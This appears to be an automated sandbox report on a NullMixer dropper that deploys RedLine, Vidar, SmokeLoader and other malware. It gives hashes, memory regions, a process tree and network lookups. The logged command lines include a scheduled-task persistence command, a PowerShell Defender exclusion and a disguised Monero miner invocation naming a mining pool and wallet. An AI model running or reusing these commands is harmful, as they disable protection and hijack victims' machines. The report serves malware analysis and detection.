MD5 b15d3c878a51f11190d6886cb3ab8b73
SHA1 5775318b9b4a44eec3fbca27a2b8d165e2ab0308
SHA256 8c2fe5a4625e7dc1928d5ade9053d6ad655fb1d47beead8e5642493fc7f44beb
SHA512 8937ac421269338abe25b3ed8797ff40e827ee5c69c3d8e9e5f40e2b7813b6cf5d7b126fa974e2e50f393efe24381e20b4d7cb83a668b7c046e6f180e5995f9a

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 f3978f536f40d2d434c1d85e7f5e330b
SHA1 fbaed8394314bcfb835f6e7bc7dbbacf225db80a
SHA256 78be629934adc57181021d05c175ef7fbe6e3849fb97fb8fc5e3cbee1144afad
SHA512 0cd65d47e12ee1697407aee1046a5a1724ef3accf60b78706efd2569244108b6163adc2f0c287ac5707aa96edf939737a9facffa5041b6befebb15ccc79a95ad

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 da7ba1e73dbcaa51469180211a111663
SHA1 3c300c8c95c7c881b7914ff9f1eeb4bdd3bae03f
SHA256 0cdff899355957cc2eab72a9cfebb49b7759c9d6099a1f657aafbde0c528f26d
SHA512 74ed715e7afc8d326d475198b5876fa28103545a4b1dcea858d4bc7ecd99ca0e99aab8c14fe5cac386ed13f632f3376c33839508227e20a75e3eefa9c6d9af85

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 5af64b02529038aa5e766dcff4ece466
SHA1 b5dd26e65e0191bb38bc58a3686a23003a41c2d8
SHA256 618024b4c0c8d3ca9924b8536804b83760e2e1140d8e400bf972e8ac79c7facb
SHA512 a2186d277238c43fe781dd273400bba2cd31f7a7dd24d5d8b6bd74b5e76eeacc18b54434952362a2b195351937c4303b7c01eefb0d79da8482cc6cda434c3107

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 0a7f5ccfee694282b3c0ffecf42fb5b2
SHA1 693ccc5ed5712d143f334e009c2fdc30eb67112d
SHA256 a3bd0a2d0ac227c60f68311863463c86ed23279dde0685152ec8581ba5a27f2a
SHA512 233a94eb25bb81bca975c5bfa0d236a967d8ab3ef7dec18dcb5a31437946c5715f59f927a2d646636acca1faa372b86dcb725c976b2ecaa9cadf605be1dd3d72

memory/2960-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2960-52-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2960-54-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2960-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2960-55-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2960-60-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2960-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe

MD5 3263859df4866bf393d46f06f331a08f
SHA1 5b4665de13c9727a502f4d11afb800b075929d6c
SHA256 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
SHA512 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\dc8baab07.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe

MD5 22272aaee3f0ff421c0a2d5abeed26c9
SHA1 f7f6b229e4da0139102fbb49015aa894b99829e3
SHA256 dcfe57e3b65ddfb62112935f3dd640379828a83533bea0e7badd3a3870f0fc34
SHA512 f351105b7aed518ac8ab80d61fe5baf8ba37b4c689e560e4ad147a6c21c4dcf98e47816e65aa47cab87dcd9115bb2b071b71344a569979ee1413bccd84122207

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\45523e3cdecd50c9.exe

MD5 181f1849ccb484af2eebb90894706150
SHA1 45dee946a7abc9c1c05d158a05e768e06a0d2cdc
SHA256 aeb2d203b415b00e0a23aa026862cec8e11962fdb99c6dce38fb0b018b7d8409
SHA512 a87485005ca80e145a7b734735184fa2d374a7f02e591eec9e51b77dc2a51be7f8198ce5abfceb9546c48bf235a555f19d6c57469975d0b4c786b0db16df930c

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe

MD5 dea4fe16fc93c5de689cad2450123f27
SHA1 b1358b24f4f0769b7dd09c4db1633e38829bf756
SHA256 39e0d892a41c3488275e7e048838d1f9dc9602435f7a8d1f5fdbc54973c5a5fd
SHA512 f0e688558bbbb357c0afdb6f85a6a6898b7ce4e35fa13e3b55df5229e22035b66558d8795adafb99ea860e1789afedfd563743ba4f264b924ac844fc59eac506

memory/1912-135-0x0000000000010000-0x0000000000018000-memory.dmp

memory/1576-134-0x0000000000AA0000-0x0000000000ACE000-memory.dmp

memory/2308-137-0x0000000001370000-0x00000000014B2000-memory.dmp

memory/1476-136-0x0000000000160000-0x000000000024E000-memory.dmp

memory/1912-138-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/1576-141-0x00000000002C0000-0x00000000002C6000-memory.dmp

memory/2648-140-0x00000000001D0000-0x00000000001D9000-memory.dmp

memory/2648-139-0x00000000002E0000-0x00000000003E0000-memory.dmp

memory/2960-62-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2960-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2960-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1576-142-0x00000000002D0000-0x00000000002F2000-memory.dmp

memory/1576-145-0x00000000002F0000-0x00000000002F6000-memory.dmp

memory/1824-147-0x0000000000360000-0x00000000003FD000-memory.dmp

memory/1824-146-0x0000000003470000-0x0000000003570000-memory.dmp

memory/2648-144-0x0000000000400000-0x00000000032F8000-memory.dmp

memory/2960-50-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1528-159-0x000000013F110000-0x000000013F120000-memory.dmp

memory/1824-161-0x0000000000400000-0x000000000334B000-memory.dmp

memory/1528-162-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/1576-163-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/1912-164-0x000000001AFD0000-0x000000001B050000-memory.dmp

memory/2960-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2960-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1576-165-0x000000001AF70000-0x000000001AFF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA21B.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\TarA25C.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

memory/2476-194-0x0000000001F10000-0x0000000001FF4000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 f128ef15f55d03f02604a88319ef64f1
SHA1 772aeeecda5e78f8709633210d8aa684d9baa900
SHA256 d07159093a1afa2287ef8bc0013ddaf8a66d946f1d532c8e0a4fbbd36df531cb
SHA512 db74527d3b0fd799f41023effe2ed53dcb1d914707c6fd0bd82bed18961dc2fa5c9e2f7a26d21345eb1b01a1fe93102d5f69e615e58dd4375f0103fbe5c530f3

memory/3024-212-0x0000000000190000-0x0000000000274000-memory.dmp

memory/2308-236-0x0000000000340000-0x0000000000352000-memory.dmp

memory/1204-249-0x0000000002A40000-0x0000000002A56000-memory.dmp

memory/2648-250-0x0000000000400000-0x00000000032F8000-memory.dmp

memory/2960-254-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2960-258-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2960-257-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2960-256-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2960-255-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2960-253-0x0000000000400000-0x0000000000A11000-memory.dmp

memory/1824-262-0x0000000000400000-0x000000000334B000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8cf2a36d61baad3ea3a5ee49ea118e86
SHA1 a089a5f7096cda35bdc91e5ac499c330364802ff
SHA256 700c93608fc7c9db2def13ff303b21b15e08fc45b04f9d729a9f918cb004e570
SHA512 02802b5006552172a52f075b7a57872d6f44479f4e682737550f8ed465a68c78bd0e3d6f614c8b8e8cffd3ca50f087985690a6e0b81d5cc783a07e36f2b7641d

memory/1912-344-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/1576-363-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/1824-367-0x0000000003470000-0x0000000003570000-memory.dmp

memory/1528-368-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/1912-369-0x000000001AFD0000-0x000000001B050000-memory.dmp

memory/1528-378-0x0000000000650000-0x000000000065E000-memory.dmp

memory/1528-377-0x000000001B830000-0x000000001B8B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\services64.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/2820-389-0x000000013FB70000-0x000000013FB80000-memory.dmp

memory/1528-391-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/2820-390-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/2308-399-0x0000000006120000-0x00000000061AC000-memory.dmp

memory/2308-400-0x0000000000770000-0x000000000078E000-memory.dmp

memory/3008-404-0x0000000000400000-0x000000000041E000-memory.dmp

memory/3008-403-0x0000000000400000-0x000000000041E000-memory.dmp

memory/3008-413-0x0000000000400000-0x000000000041E000-memory.dmp

memory/3008-401-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS61DF.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/1468-453-0x0000000070940000-0x0000000070EEB000-memory.dmp

memory/1468-454-0x00000000023B0000-0x00000000023F0000-memory.dmp

memory/1468-492-0x0000000070940000-0x0000000070EEB000-memory.dmp

memory/2820-533-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fa61b0a8ddfba2f93cc2466d8bc99de9
SHA1 818003bca620fd5d623fc7e3bc71548cdc7337a5
SHA256 8175d68704e2fae04b4b2967a79414207b1ca6caf0bc87c18e4029dd565ecf84
SHA512 dcccdcccfdad6a206949348b993df6f49cd8ab1fb53923f7f686be82f9abb681b04b854ec97da2eacca608700ec93c4d7f04054f5171ffb736a75a0e131946a4

memory/2820-897-0x000000001AE30000-0x000000001AEB0000-memory.dmp

memory/2552-911-0x000000013FCF0000-0x000000013FCF6000-memory.dmp

memory/2552-912-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/2552-913-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/2820-991-0x000000001AE30000-0x000000001AEB0000-memory.dmp

memory/2552-992-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/2552-999-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/2464-1021-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2820-1020-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/2464-1035-0x00000000002F0000-0x0000000000310000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b64df7ebd6fd2803d8b05867a5ad76a8
SHA1 537f97bb0d45b7f64d0e2fc27ccf42a10796de67
SHA256 e400f8c778cea9c5121e7270d39fc3849f01d4eeee7e627a80204b43048d6c2d
SHA512 3f74b735b75ebbf5f215dfffe4079773fc059db174a82f261c7e7d5718cedb127fa82c9c04548f69f395eb4de035e87b63b6e53517e802d61a94a83b55ea380d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 544dbecc54630af4e99de2600a655653
SHA1 7c8cede7a8606c1f225187252a5e9acab4f6def7
SHA256 ef00d56eb2ac5b13cfefe061e7f91913b4112165461bebf26acff40746f36fd7
SHA512 c9ece78875e1018d4126e9c563c438da545532cd374dfb422e22e55812fc09626dbd991dfc7bfa94d5d2003239394f7d09bc948a3540fb29e5c9fba3891c95cf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2464-1482-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2464-1483-0x00000000002F0000-0x0000000000310000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-31 03:59

Reported

2024-01-02 03:57

Platform

win10v2004-20231215-en

Max time kernel

0s

Max time network

106s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"

Signatures

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

RisePro

stealer risepro

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe

"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cc8d5bf9d8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 52748077bb26.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\0c879100232.exe

0c879100232.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2544 -ip 2544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 556

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167719 0

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe

"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe" -a

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe

23cfc2c69e2b5.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cc8d5bf9d8.exe

cc8d5bf9d8.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cfbebc6111c611.exe

cfbebc6111c611.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\52748077bb26.exe

52748077bb26.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\45523e3cdecd50c9.exe

45523e3cdecd50c9.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\f35fb6370e5673.exe

f35fb6370e5673.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\227af833e4e9ad4.exe

227af833e4e9ad4.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\dc8baab07.exe

dc8baab07.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c dc8baab07.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 23cfc2c69e2b5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f35fb6370e5673.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 227af833e4e9ad4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0c879100232.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cfbebc6111c611.exe

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS1807.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb469e46f8,0x7ffb469e4708,0x7ffb469e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 148.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 s.lletlee.com udp
